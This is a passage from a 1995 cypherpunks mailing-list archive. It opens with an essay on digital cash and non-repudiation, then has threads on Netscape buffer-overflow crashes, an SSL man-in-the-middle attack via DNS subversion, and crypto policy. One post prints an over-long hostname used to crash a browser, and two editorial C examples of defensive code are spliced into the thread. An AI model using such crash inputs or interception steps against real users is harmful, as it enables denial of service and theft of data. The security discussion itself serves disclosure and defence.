The reason we have the multiplicity of financial instruments out there to begin with is because there is money in creating them. But the reason there's money in it is because of the fall of the price of networked computer-based communication. The market they're traded in exists in computers. The decisions made to buy and sell them are at least facilitated by computers. The clearing and settlement of these instruments are done on computers. However, these systems are all centralized, closed, private systems. For that reason, the very acceleration of processing cost-effectiveness which created them is going to sweep them away someday.

The bleeding edge of all this is the so-called 'synthetic' security, something which exists as a software manifestation of the most recent financial theory, sometimes only experimental and a few hours old, sometimes sold to an investment bank's clients just like any other security, secondary markets and all. A combination of purchases and short sales of put and call options on a particular bond, which behaves like the bond in price, for example, without having to hold the bond itself.
This is usually done because the liquidity or the transaction cost of holding these instruments is lower than that of the bond. In addition, since unwinding of the synthetic security should yield the price of the bond after transaction costs, any discrepancies between the two yields an opportunity for arbitrage.

Of course, in the early days, all of 10 years ago, theory held somewhat more promise than reality. The great "portfolio insurance" fiasco of the early 80's arose from the fact that the options trades which were supposed to offset the fall of the price of a security in this fashion turned out to be not very liquid after all. When the time came to unwind these positions in a hurry, they got stuck. That's not as much of a problem these days, as evidenced by the proliferation of increasingly sophisticated securities based on the same idea, which trade and settle just fine.

Note that we're talking about book-entry entities here. That is, these modern securities are creatures of an environment where software "applications" reside on a particular computer on a particular local or private network, to manipulate centralized accounting entries on that computer or elsewhere, in order to reflect the expected or traded value of a security. Things that live "on" a computer. It's controlled completely from the outside, with the exception of the behavior of the market. Not "in" it, or "in" the network the computer's hooked into.

Notice how different all that is from a digital certificate like Chaumian digital cash. When you get a digital certificate, you receive it through a cryptographic protocol which ensures that it is what it says it is. If the certificate is traded on-line, then the certificate's issuer vouches for it right then and there. If it is traded off-line (someday, I hope...) the certificate speaks for itself, just like a dollar bill's supposed to. As such, it can reside anywhere, not as a book-entry "on" a central computer somewhere, but "in" the network.
Notice also we are backing down a level of abstraction from the status quo. A certificate is what it says it is; it is not book-entry, which is a pointer to something which is what it says it is.

That's the paradox of modern book entry systems. A book entry used to just "point" to a physical certificate, which in turn points to a cash-flow or a series of cash-flows of some kind. Of course, the term "book entry" is almost exclusively used to describe clearing capital market trades without the physical exchange of certificates for other pieces of paper (receipts, checks, signature guarantees, etc.). The institutional ideal in this environment is a clearing-house wire clearing the trade in exchange for a bank wire transfer settling the trade. The book entry becomes the primary abstraction, not any certificate it is supposed to represent.

The problem with book entries, of course, is the problem with any database. You have to manipulate that database, and to do that, you have to get access, and to do that you need permission... you get the point. In a capital market, that costs money, and it's costing more and more as a percentage of the revenue derived from the transaction, because to get access, you need human permission and intervention. If a human isn't supervising things, people take advantage of their access. Mr. Leeson of Barings was a classic case in point. Meanwhile, Moore's law keeps lowering the cost of the rest of the production cycle.

Another problem, closer to the heart of this list, is that of anonymity. The ultimate authority to modify that particular line item or database field derives from the "owner" of that entry; since it is usually modified by someone else, "a chain of custody" is needed: audit trails, and of course, True Names are necessary somewhere, even with numbered accounts. The primary point for inventing double-entry bookkeeping was so owners could control accountants, after all.
When electronic book entries started replacing paper ones, the resulting economies of scale caused great centralization to occur. As I've said here before, lines were cheaper than nodes, and things got bigger and bigger. The advent of the microprocessor has been continually eating away at these large control hierarchies, and making them harder and harder to maintain. Things are getting out of control again.

In an out of control environment, like that found on public uncontrolled networks like the internet, software has to be autonomous. A certificate, like a piece of digital cash, is an autonomous entity. As we said before, it is what it says it is. Because of a cryptographic protocol, you trust the thing because of the way it behaves, not because you trust the people who gave you access to it.

Now, Tim is talking about another type of autonomous entity, an agent, basically, a "friendly" virus. A piece of code which is launched or launches itself on one machine, crosses a network, runs itself on another machine, and returns with a result. Our current concept of software agents implies that there's something on another machine needs to be "got", usually a database requiring access and permissions, which is why people who manage centralized repositories of information are nervous about them, just like microcomputers made their mainframe predecessors nervous.

On the other hand, it's easy to see a scenario where two agents arrange to meet somewhere on a *public* network, in the presence of another "impartial" agent to exchange certificates, trading, settling and clearing all in one shot. Unsupervised. Out of control. Because the agents are engaging in a cryptographic process which "breaks" if the entities behave improperly, fraud is supposed to be prevented.
Which brings me to something which goes right to the heart of one of our most cherished ideas here on cypherpunks, the idea of crypto-anarchy: with the right cryptography, agreements become unenforceable because perfect anonymity disconnects the "pointers" between digital and physical identity. Crypto-anarchy means that states don't know who to force to do what. Technology does this, it's reality, it's not optional, so we better get used to it.

The catch to all of this is a curious conceptual double negative called non-repudiation. I had trouble remembering the name for a while, I kept wanting to say "plausible deniability", in the spirit of Admiral Poindexter. But I've had to remember the real name, because the idea's so damned important.

Right now, the canon of commercial law for the entire free world (just so I can't be accused of quibbling here :-) ) is completely based on the concept of non-repudiation, that is, you can't repudiate an agreement, or a trade, or you face legal sanction. Force, in other words. Ultimately, the state can send you to jail, or worse.

About a year ago, when www-buyinfo had active discussion on it, (and had not yet been turned into cyphe$rpunks by my reflexive redirection there of all the e$ cheezy-bits from cypherpunks ;-), ) I got into an interesting discussion there about non-repudiation and I didn't even know I was involved in one. We were arguing about a familiar dichotomy in the concept of digital cash, the difference between on-line and off-line protocols. I was arguing that on-line cash was better because it was a more "peer-to-peer" proposition than an online system, which required access to a network connection, and high-bandwidth processing at the certificate issuer so the issuer could participate in *every* *single* *cash* *settlement*. That invasive participation struck me as antithetical to the whole concept of a hyper-distributed geodesic economy that I thought that digital commerce was going to become.
The technology which made it possible for anyone, anywhere, to sell anything digitable -- music, movies, information, teleoperator control sequences, professional services, and financial instruments -- to anyone else, while using the cheapest possible transaction protocol, that is, cash, a protocol which immediately and finally clears and settles a transaction, will win out in the end.

So, I was finding myself twisting in the wind about all of this, trying to figure out how offline cash was going to have to work if double-spending was possible, how it could be kept to manageable levels. I found myself saying things like (forgive me), "Well, if they double-spend, put 'em in the airlo- er, throw 'em in jail!". In other words, we have the key of the double spender, even if she's anonymous, so we could use snitches, subpoenas of bank records, and plain old detective work, to send her to jail should she repudiate the agreement to not double-spend. It's hard to see how that would happen in a perfect world with perfect anonymity, much less in a world where nation-states couldn't collect income to pay for judges, courts, and LEAs. Nick Szabo was gleefully slapping me around the head and shoulders about this, and I retired from the field. So, no matter how much the idea refuses to leave my thick Frisian head, I'll leave that big, red, dog ("Hey, baby...") sleeping on the front porch for the time being.

This without even *touching* the other problem with digital cash in general, Nathaniel Borenstein's favorite anti-digital-cash 2-by-4 -- which threatens *all* digital cash systems on- or off- line -- the prospect of someone *inside* a certificate issuer stealing the private key for an entire issue, and printing all the money she wants. To that I say, use multiple issues, and distribute keys, but I see that big red dog's waking up, so we'll move on...

So, you can see we're talking about the alleged inability of cryptography to deal with the repudiation of digital cash trades.
It cannot currently keep transactions either the way cypherpunks want, utterly anonymous, and the way I want them, off-line. In fact, at the moment, I'm very close to holding the strong form of this argument, that is, the concept of non-repudiation is the *only* reason we're being forced into true-name trades right now. It's not the long arm of the law, it's the market, which makes sense. If it was just a legal obstacle, and really contrary to market forces, it should have collapsed under a barrage of regulatory arbitrage attempts. No threat of legal force would have prevented people from trying to make money issuing digital cash. The War on Some Drugs is a good example of this. If we could get digital cash trades, or trades of any kind of financial instrument for that matter, to trade on public networks without the ability to repudiate them, it probably won't matter whether they're illegal, which is interesting, to say the least, but it's no different from what happens with paper certificates.

Now, as usual, all this is no brilliant insight on my part. A few days ago, I didn't know what "non-repudiation" meant. On Wednesday, I had a very interesting over-coffee conversation with Yet Another Professional Who Wants To Remain Anonymous. I must be a magnet to these people for some reason, at least until they figure out I'm not *that* useful. Or maybe it's because I need so much help.

Anyway, people who were on cypherpunks last summer remember my previous anonymous legal informant, the esteemed counsellor Vinnie "The Pro" Bono, not to be confused with his second cousin, the Honorable Sonny. "Vinnie" wanted to remain anonymous because he was afraid of being deluged with requests for free legal advice, among other things.
I still won't tell you who he was, but he has since "come out", and, of course, we *aren't* choking his POP server with requests to get our various relations out of the slammer, or anything else for that matter, even though he talks freely here under his True Name. I expect my new friend will figure this out soon enough. The other reason he gave is that he's so damn busy he doesn't have time to do much but lurk. Unfortunately, this guy lurks not here, but on www-buyinfo, having signed on to cypherpunks and deciding *not* to drink from a firehose, thank you very much, and since I've been spamming it lately with the aforementioned cypherpunks e$ cheezy bits, he seems to prefer it there. I have to admit myself that as much as *I* like it here, it is an acquired taste... Now, our friend Vinnie has some very serious credentials, but this new guy is just plain scary because he's so focused on the commercial law of EDI and electronic commerce. This hypercredentialed gentleman shows up on the program committee of various "suit" conferences on electronic commerce, sponsored by various international legal entities and TLAs, and seems to be up to his elbows in the Current Fantasy according to the Powers that Be, in particular, its legal armature: legal sanction, non-repudiation, True Names, and all. Which leads me to *his* moniker. I thought I was going to be civil about this, and just refer to him in the third person singular, but I had this amazing brainstorm. Remember the comedian "Professor" Edwin Corey, who died recently? His schtick was a variant on the nutty professor, obfuscatory language, lab coat, Converse high-tops and all, and he called himself "The World's Foremost Authority". Didn't say on what, which was the point. As a philosophy major at Mizzou who really loved his informal fallacies, one of which was the Appeal to Authority, this particular example always made me laugh. So, I've dubbed this particular informant "Edwin Corey", or "Mr.
Corey" in true Oxfordian fashion, not to be at all uncharitable, but because, in truth, this guy is probably the world's foremost authority on this stuff, if anyone is... He's going to give me pointers to some of this proposed "legal armature" from time to time, the first of which is a report by one Michael Baum entitled, deep breath, "Federal Certification Authority Liability and Policy: Law and Policy of Certificate-Based Public Key and Digital Signatures". This 500+ page monster can be obtained from, who else, The Feds, in particular, another big breath, the United States Department of Commerce, Technology Administration, National Technical Information Service, Springfield, VA, 22161; (703) 487-4650. The cost is $61, plus $6 for shipping and handling, plus $2 for orders sent outside the U.S., Canada or Mexico, plus rush charges if you call 1-800-553-NTIS, and if you *don't* jump up and down three times *before* you write the check or read them your credit card over the phone, the trade will be repudiated. ;-). Oh. It says something here about being able to get it through a web-site called FedWorld, http://www.fedworld.gov . So, it's very important to work on financial objects and agents. However, I should really try to concentrate on the issue of non-repudiation, because it is a necessary, and maybe (strong form) necessary and sufficient, criterion for the development of digital commerce on public networks. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<<

From ddt at lsd.com Fri Sep 22 06:27:36 1995 From: ddt at lsd.com (Dave Del Torto) Date: Fri, 22 Sep 95 06:27:36 PDT Subject: Cypherpunks Press release Message-ID:
At 9:09 am 9/20/95, David J. Bianco wrote: >On Sep 20, 10:28, Dietrich J.
Kappe sent the following to the NSA's mail archives: >> Subject: Cypherpunks Press release >|| -----BEGIN PGP SIGNED MESSAGE----- >|| >|| We've seen the word "hacker" kicked around rather arbitrarily in the press. >|| Are we to conclude that the cypherpunks are a bunch of hackers? I think it's >|| time for some cypherpunks spin. How about a logo *and* a press release? The >|| press release would give contacts (email, phone, etc.) so that someone on >|| this list would be contacted by journalists when a crypto story breaks. >|| >|| If we get enough volunteers, we can fax blanket every newspaper, station, >|| and network in the world. >|| > >I think it's a great idea, personally. I think many journalists would like >to find third party opinions about network security and other cryptography >issues, but just don't know who to talk to about them. By making it easy >for them to find us, we'd be more likely to be consulted for opinions. [elided] I think a media contact group is a good idea too, but I think we should handle it by having a special address that media people can send to to request information and that it should split the incoming mail and route it to a group of volunteers who could then respond. Questions from media people are usually NOT going to be heavily tech-oriented, and this sort of press list would give the lesser cryptologists among us, who nevertheless have a significant amount of knowledge about public policy issues concerning crypto, a chance to be useful. BTW, is still operating, and the small group of knowledgeable cypherpunks there all see the mail that comes in and cc the list when someone asks a PGP question and gets it answered by one or more of the volunteers. This would be a good model to expand on, imho. Everyone learns something, people go away impressed by the quality answers, etc.
:) dave From herbs at interlog.com Fri Sep 22 06:41:58 1995 From: herbs at interlog.com (Herb Sutter) Date: Fri, 22 Sep 95 06:41:58 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509221341.JAA07664@gold.interlog.com> At 07:33 1995.09.22 GMT, Jeff Weinstein wrote: >In article <199509220612.CAA11441 at clark.net>, rjc at clark.net (Ray Cromwell) writes: >> I've found a Netscape bug which I suspect is a buffer overflow and >> may have the potential for serious damage. If it is an overflow bug, >> then it may be possible to infect every computer which accesses a web >> page with Netscape. To see the bug, create an html file containing >> the following: > > Thanks for the report. I will make sure that this is fixed. > > --Jeff Don't just look at this bug, though... check ALL your static buffers and include code to check for overflow writes. For example, if Netscape is written in C or C++ and the above code uses strcpy(), you could change strcpy() to strncpy() everywhere (and then set the last char to null in case strncpy() didn't). Your programmers will know what I mean. Herb ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Herb Sutter 2228 Urwin, Suite 102 voice (416) 618-0184 Connected Object Solutions Oakville ON Canada L6L 2T2 fax (905) 847-6019 From fletch at ain.bls.com Fri Sep 22 07:06:55 1995 From: fletch at ain.bls.com (Mike Fletcher) Date: Fri, 22 Sep 95 07:06:55 PDT Subject: Netscape closes up 1 3/8 today! In-Reply-To: <199509211846.LAA04164@orac.engr.sgi.com> Message-ID: <9509221401.AA26983@outland> I've been lurking for a week or two, but I wanted to say something about this: > I think it probably has more to do with the fact that the name > "Netscape" has been on the front page of every major newspaper in the > US. I guess bad press is better than no press at all. And the press > hasn't even been that bad. 
And you have to take into account that a good chunk of the population has no clue about how either encryption (well, basic math for a good chunk :/ ) or software works. Just heard something on the radio (Niel Bortz, if you're curious) about how California public schools have started giving credit for wrong answers on MATH tests. So the students don't _feel bad_ about being wrong. I want to trust my life to an airplane designed by someone who got the right answers, not to someone who has artificially induced high self-esteem. The casual Joe Sixpack at most may know that if Microsloth Doesn'tWorks has a problem he goes out 9 months later and shells out more $$$ for the next buggy release. Start mentioning 128-bit IDEA, entropy, or pseudo-anything and their eyes may just glaze over. With the state of public education, it'll be amazing if Joe Sixpack can figure out that he has to plug in his computer first; never mind understand why trusting his financial secrets to a secret "proprietary" encryption scheme that the gubument has the back door to is a bad idea. Sorry, I'll end my ranting now. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------

From bianco at itribe.net Fri Sep 22 07:10:59 1995 From: bianco at itribe.net (David J. Bianco) Date: Fri, 22 Sep 95 07:10:59 PDT Subject: SSL Man-in-the-middle Message-ID: <199509221407.KAA23176@gatekeeper.itribe.net>
Has anyone given much thought to the feasibility of a man-in-the-middle attack against an SSL (or other similar) transaction? To me, the possibility seems obvious, so I figure it must have been discussed before, though I haven't seen it. The basic idea is pretty simple, really a flaw in the user interface of the browser more than a flaw in SSL.
Neither browsers nor servers routinely validate that they are communicating with the entity they think they are. Sure, with Netscape you can ask for the document information window, which shows the server's public key information, but this isn't a common action among users, and certainly isn't something you'd want to do for every page you viewed. The only readily accessible information about security is that blue key at the bottom of the Netscape window. Netscape docs tell you that if that key is blue, your transaction is "secure." In reality, the only thing that key means is that you've negotiated a session key and are encrypting your communications. It says nothing about the fact that you're actually communicating with the correct party. Authentication is a large part of security, and Netscape doesn't make that information conveniently available. Consider the following example. Bob wants to communicate securely with Alice. He fires up his "secure" browser, looks up Alice's address in the DNS and makes a connection. He then sends Alice a document and disconnects. Now consider the following attack on the scenario: Bob still wants to communicate with Alice. He fires up his browser and looks up Alice in the DNS. Mallet, who wants the information Bob's sending, has subverted Alice's DNS server and replaced Alice's IP address with his own, making a note of the proper value. Thus, when Bob looks up Alice's address in DNS, he gets the wrong information and contacts Mallet instead. Mallet performs the SSL protocol with Bob, pretending to be the server, and then with Alice, pretending to be the client. Since neither the browser nor the server performs any authentication checks, neither Bob nor Alice knows they are really speaking to Mallet. The best Alice can do is check the IP address of the client she's speaking to, but if Mallet has his own DNS, he can make the IP address map to whatever name he wants, including Bob, in order to fool Alice.
Even if Alice doesn't depend on the DNS for IP resolution, she probably doesn't know that the IP address in question is really Mallet's, since it looks just like any other IP address to her. In this scenario, Bob gets a warm fuzzy since his key is blue and he knows his information is being encrypted as it goes out. Alice has a smaller fuzzy, since she believes the transaction is secure from prying eyes. Mallet has a *really big* fuzzy, since he's able to read the data Bob sends, decrypt it, save it, then re-send it to Alice. I've read through the SSL spec, and it provides authentication for both the server and the client, but these features are rarely used, probably because they are somewhat inconvenient for the user. A good first step would be to include the IP address of the server in the certificate signed by VeriSign. In this way, browsers could perform automatic checks that the IP address in the certificate is actually the one that's being communicated with. This does raise other questions (such as protecting from IP spoofing), but IMHO would be a good way of providing an automatic "first check" without inconveniencing users. The added inconvenience of obtaining a new certificate when your server's IP address changes is fairly minor, and could be viewed as necessary overhead for doing secure transactions via the Net. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc.
| Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/

From m1smf99 at FRB.GOV Fri Sep 22 07:13:45 1995 From: m1smf99 at FRB.GOV (Scott M Fabbri) Date: Fri, 22 Sep 95 07:13:45 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com> Message-ID: <9509221411.AA00721@arcss5.FRB.GOV>
> I don't believe the Sun Java stuff would suffer from it, although I > fear Java a great deal. Java doesn't break on this one. All you get back is a message saying the domain isn't defined. BTW: This was tested using http://foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo .foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo .foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo. foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo .foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/ on a SunOS box using HotJava 1.0 alpha 3. Scott -- Scott Fabbri sfabbri at frb.gov Opinions solely my own -- who else would want them?
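Herb Sutter's advice earlier in the thread (bounded copies into every static buffer, with the terminating NUL written explicitly), as an added example in C that is not code from the thread or from Netscape. The host buffer size, the URL splitting and the "foo.foo..." hostname are my own constructions modelled on what the thread reports.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define HOST_MAX 64  /* assumed size of a fixed host buffer inside a URL parser */

/* strncpy() plus the explicit terminator Herb's parenthetical asks for:
 * strncpy() writes no NUL at all when src fills the whole destination.
 * Returns true if src fitted entirely, false if it had to be truncated. */
bool copy_host_bounded(char *dst, size_t dst_size, const char *src)
{
    if (dst_size == 0)
        return false;
    strncpy(dst, src, dst_size - 1);
    dst[dst_size - 1] = '\0';          /* the step strncpy() alone may skip */
    return strlen(src) < dst_size;     /* anything cut off is an error for the caller */
}

/* Shows the strncpy() pitfall directly: fill a scratch buffer with 'X', copy
 * src into n bytes, and report whether any NUL ended up inside those n bytes. */
bool strncpy_wrote_nul(const char *src, size_t n)
{
    char scratch[32];
    if (n > sizeof scratch)
        return false;
    memset(scratch, 'X', sizeof scratch);
    strncpy(scratch, src, n);
    return memchr(scratch, '\0', n) != NULL;
}

/* Pull the host out of an http:// URL into a caller-supplied buffer.
 * Instead of strcpy()ing whatever length the page author chose, measure first
 * and refuse a host that cannot fit together with its terminator.
 * Returns 0 on success, -1 for a non-http URL, -2 for an over-long host. */
int extract_host(const char *url, char *host, size_t host_size)
{
    const char *start;
    size_t len;

    if (strncmp(url, "http://", 7) != 0)
        return -1;
    start = url + 7;
    len = strcspn(start, "/:?");        /* host ends at path, port or query */
    if (len >= host_size)
        return -2;                      /* would overflow: reject, do not truncate */
    memcpy(host, start, len);
    host[len] = '\0';
    return 0;
}

/* Constructed input: a URL whose host is `labels` copies of "foo", like the
 * long hostnames the thread used to make the browser fall over. */
void build_long_url(char *out, size_t out_size, int labels)
{
    size_t used;
    if (out_size < 16) {
        if (out_size) out[0] = '\0';
        return;
    }
    used = (size_t)snprintf(out, out_size, "http://");
    for (int i = 0; i < labels && used + 5 < out_size; i++)
        used += (size_t)snprintf(out + used, out_size - used, "%sfoo", i ? "." : "");
    snprintf(out + used, out_size - used, "/");
}

int main(void)
{
    char host[HOST_MAX];
    char long_url[512];

    build_long_url(long_url, sizeof long_url, 100);
    printf("normal URL: rc=%d host=%s\n",
           extract_host("http://www.example.com/index.html", host, sizeof host), host);
    printf("100-label URL: rc=%d (rejected before any byte is copied)\n",
           extract_host(long_url, host, sizeof host));
    printf("strncpy terminated an 8-byte copy of \"abc\": %s\n",
           strncpy_wrote_nul("abc", 8) ? "yes" : "no");
    printf("strncpy terminated an 8-byte copy of \"abcdefgh\": %s\n",
           strncpy_wrote_nul("abcdefgh", 8) ? "yes" : "no");
    return 0;
}
```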
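The post-handshake identity check that David Bianco's SSL post above says browsers were skipping, as an added example in C that is not from the post or from any browser: once the session key is negotiated, the client compares the names the server certificate carries against the host it set out to reach, which is what keeps Mallet's certificate from passing for Alice's. The san_entry structure, the Alice/Mallet certificates and the IP comparison as canonical dotted-quad text are my assumptions; parsing the certificate itself is taken as already done.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Assumed shape of what a certificate parser hands back: the subjectAltName
 * entries, each a DNS name (possibly "*.domain") or an IP address string. */
typedef enum { SAN_DNS, SAN_IP } san_kind;
typedef struct {
    san_kind kind;
    const char *value;
} san_entry;

/* Case-insensitive equality, since DNS labels are case-insensitive. */
static bool ci_equal(const char *a, const char *b)
{
    for (; *a != '\0' && *b != '\0'; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return false;
    return *a == '\0' && *b == '\0';
}

/* Does a certificate DNS name cover the host the user asked for?
 * A leading "*." stands for exactly one label: "*.alice.example" covers
 * "www.alice.example" but neither "alice.example" nor "a.b.alice.example". */
bool dns_name_matches(const char *pattern, const char *host)
{
    if (strncmp(pattern, "*.", 2) == 0) {
        const char *dot = strchr(host, '.');
        if (dot == NULL || dot == host)
            return false;               /* no leftmost label for the '*' to absorb */
        return ci_equal(pattern + 2, dot + 1);
    }
    return ci_equal(pattern, host);
}

/* The check itself. `peer` is what the user meant to reach: the hostname typed
 * into the URL, or, with peer_is_ip set, the address actually connected to
 * (read back from the socket, not from DNS, since DNS is what Mallet controls).
 * A finished handshake on its own proves only that traffic is encrypted, which
 * is all the blue key ever showed; this is the part that proves who is on the
 * other end, assuming the certificate's signature chain was already verified. */
bool cert_names_peer(const san_entry *sans, size_t count,
                     const char *peer, bool peer_is_ip)
{
    for (size_t i = 0; i < count; i++) {
        if (peer_is_ip) {
            if (sans[i].kind == SAN_IP && strcmp(sans[i].value, peer) == 0)
                return true;            /* assumes both sides use canonical text */
        } else {
            if (sans[i].kind == SAN_DNS && dns_name_matches(sans[i].value, peer))
                return true;
        }
    }
    return false;
}

int main(void)
{
    /* Constructed certificates for the thread's scenario. */
    const san_entry alice_cert[] = {
        { SAN_DNS, "www.alice.example" },
        { SAN_DNS, "*.alice.example" },
        { SAN_IP,  "192.0.2.10" },      /* the IP-in-the-certificate idea from the post */
    };
    const san_entry mallet_cert[] = {
        { SAN_DNS, "www.mallet.example" },
    };
    const char *wanted = "www.alice.example";   /* what Bob typed */

    printf("Alice's certificate for %s: %s\n", wanted,
           cert_names_peer(alice_cert, 3, wanted, false) ? "accept" : "reject");
    printf("Mallet's certificate for %s: %s\n", wanted,
           cert_names_peer(mallet_cert, 1, wanted, false) ? "accept" : "reject");
    printf("Alice's certificate for connected address 192.0.2.10: %s\n",
           cert_names_peer(alice_cert, 3, "192.0.2.10", true) ? "accept" : "reject");
    return 0;
}
```

Mallet can still answer Bob's DNS query, but without Alice's private key he cannot present a certificate that both names Alice and chains to a trusted issuer, so the check fails closed.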
From trei at process.com Fri Sep 22 07:25:19 1995 From: trei at process.com (Peter Trei) Date: Fri, 22 Sep 95 07:25:19 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <9509221425.AA15952@toad.com>
> Date: Fri, 22 Sep 1995 02:25:21 -0600 > To: cypherpunks at toad.com (Cypherpunks Mailing List) > From: goedel at tezcat.com (Dietrich J. Kappe) > Subject: Re: Another Netscape Bug (and possible security hole) > > -----BEGIN PGP SIGNED MESSAGE----- > > >Ray Cromwell writes: > >> I've found a Netscape bug which I suspect is a buffer overflow and > >> may have the potential for serious damage. If it is an overflow bug, > >> then it may be possible to infect every computer which accesses a web > >> page with Netscape. To see the bug, create an html file containing > >> the following: > > > >Oh brother, this is unbelievable ! > > > >I'm using Netscape 1.1N under SunOS 4.1.2.
I can crash Netscape 1.1N under NT by entering a URL with a very long domain name in the 'Location:' window. Peter Trei Senior Software Engineer Purveyor Development Team Process Software Corporation http://www.process.com trei at process.com

From bianco at itribe.net Fri Sep 22 07:37:04 1995 From: bianco at itribe.net (David J.
Bianco) Date: Fri, 22 Sep 95 07:37:04 PDT Subject: Cypherpunks Press release In-Reply-To: Message-ID: <199509221430.KAA23225@gatekeeper.itribe.net> On Sep 22, 6:26, Dave Del Torto sent the following to the NSA's mail archives: > Subject: Re: Cypherpunks Press release || I think a media contact group is a good idea too, but I think we should || handle it by having a special address that || media people can send to to request information and that it should split || the incoming mail and route it to a group of volunteers who could then || respond. Question from media people are usually NOT going to be heavily || tech-oriented, and this sort of press list would give the lesser || cryptologists among us, who nevertheless have a significant amount of || knowledge about public policy issues concerning crypto, a chance to be || useful. || I like this idea, too, except that it presupposes that the journalists who want to contact cypherpunks have access to email. Although that's a common thing, it's not uniformly available yet. Still, it's a useful service for those journalists who do have access to email. Perhaps both could be done, with the people on the mailing list also available via conventional means for the less techno-savvy journalists. -- ========================================================================== David J. Bianco | Web Wonders, Online Oddities, Cool Stuff iTribe, Inc. | Phone: (804) 446-9060 Fax: (804) 446-9061 Suite 1700, World Trade Center | email: Norfolk, VA 23510 | URL : http://www.itribe.net/~bianco/ From sameer at c2.org Fri Sep 22 07:39:36 1995 From: sameer at c2.org (sameer) Date: Fri, 22 Sep 95 07:39:36 PDT Subject: Another Netscape Bug (and possible security hole) In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com> Message-ID: <199509221434.HAA28036@infinity.c2.org> > > The problem is that if you don't produce a (benign) exploit people > aren't going to take it seriously enough. > And without an exploit you won't get a t-shirt. 
(In general, an exploit is required for a t-shirt to be made & awarded. Exceptions may be granted, however, depending upon the situation.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From frissell at panix.com Fri Sep 22 08:09:16 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 22 Sep 95 08:09:16 PDT Subject: Council of Europe proposes to outlaw strong encryption (fwd) Message-ID: <199509221509.LAA09991@panix.com> >The proposal would make telecoms operators responsible for decrypting >traffic and supplying it to governments when asked. It would also >`change national laws to enable judicial authorities to chase hackers >across borders'. > >However, `it remains possible that cryptography is available >to the public which cannot be deciphered,' his document says. `This >might lead to the conclusion to put restrictions on the possession, >distribution, or use of cryptography.' This should prove about as effective as the current French or Russian bans. What are they going to do when they figure out that there need no longer be such a thing as a telecoms operator. We do most of the message packaging ourselves. It will be a bit difficult for any connectivity supplier to tell what's going out via one of our encrypted IP sessions. Question for Perry -- I'm assuming that it will soon be possible to originate encrypted TCP/IP sessions with a distant "process" somewhere. Do you see technical problems with a TCP/IP laundry being established "somewhere" that strips trace info from one of my processes and prevents back tracing beyond the mouth of this encrypted pipe? Also Perry, what did you think of the article "How Anarchy Works" in the latest Wired on the IETF? 
DCF

From lethin at ai.mit.edu Fri Sep 22 08:15:08 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Fri, 22 Sep 95 08:15:08 PDT Subject: No Subject Message-ID: <199509221511.LAA09778@grape-nuts.ai.mit.edu>
I just received the following email message: I just concluded a small number of trades whereby I purchased cb$ with US$ at the rate of US$8 per cb$100. An obvious concern with ticker tapes is the loss of privacy. The truly paranoid should avoid even posting exchange rates, but even regular folks might want to avoid the details of each of their transactions. I still think a ticker tape to ecm with concluded transactions and bids taking place on the electronic cash market web pages is useful. I don't want to spend time polling various exchanges. The ticker tape could also be used to do arbitrage between exchanges. The names of the participants can be omitted to protect anonymity of traders. Besides, if the traders really want to protect anonymity they'll be working through remailers or TCP tunnels. The exchange SHOULD be listed on the ticker tape, so that people wanting to trade can find the spot where they can make the trade. This then serves as an advertising means for the exchanges which are offering the best prices and volume, etc. In any transaction one of the two parties will have wished they'd known the market price, if the price of the transaction is not at the market price. This ignores the value of the reputation of the parties involved, etc. So I propose that transactions and offers be sent to ecm in the following form: E= US= BUY-OFFER|SELL-OFFER|CONCLUDED DATE TIME serial# EUID= which is more or less the original syntax for ecm, substituting the exchange UID for the email address of the person making the offer. As usual the syntax is optional, so you should feel free to append other information as you'd like (expiration date, method of concluding transaction, 